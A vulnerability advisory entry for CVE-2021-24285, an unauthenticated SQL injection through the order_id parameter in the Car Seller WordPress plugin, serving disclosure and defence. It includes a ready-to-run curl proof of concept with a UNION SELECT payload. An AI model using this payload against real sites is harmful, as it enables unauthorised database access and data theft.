Lucene search
WpvulndbWPEX-ID:F35D6AB7-DD52-48B3-A79C-3F89EDF24162HistoryApr 26, 2021 - 12:00 a.m.
Car Seller - Auto Classifieds Script <= 2.1.0 - Unauthenticated SQL Injection
2021-04-2600:00:00
wpvulndb
110
car seller
auto classifieds
unauthenticated sql injection
EPSS
0.147
Percentile
95.9%
The request_list_request AJAX call of the plugin, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
curl 'https://example.com/wp-admin/admin-ajax.php' \
--data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \
--compressed \
--insecureRelated
wpvulndb
wpvulndb
nuclei
nuclei
WordPress Car Seller - Auto Classifieds Script - SQL Injection
2021-06-08 21:43:23
cvelist
cvelist
prion
prion
Sql injection
2021-05-14 12:15:00
nvd
nvd
CVE-2021-24285
2021-05-14 12:15:08
patchstack
patchstack
cve
cve
CVE-2021-24285
2021-05-14 12:15:08
checkpoint_advisories
checkpoint_advisories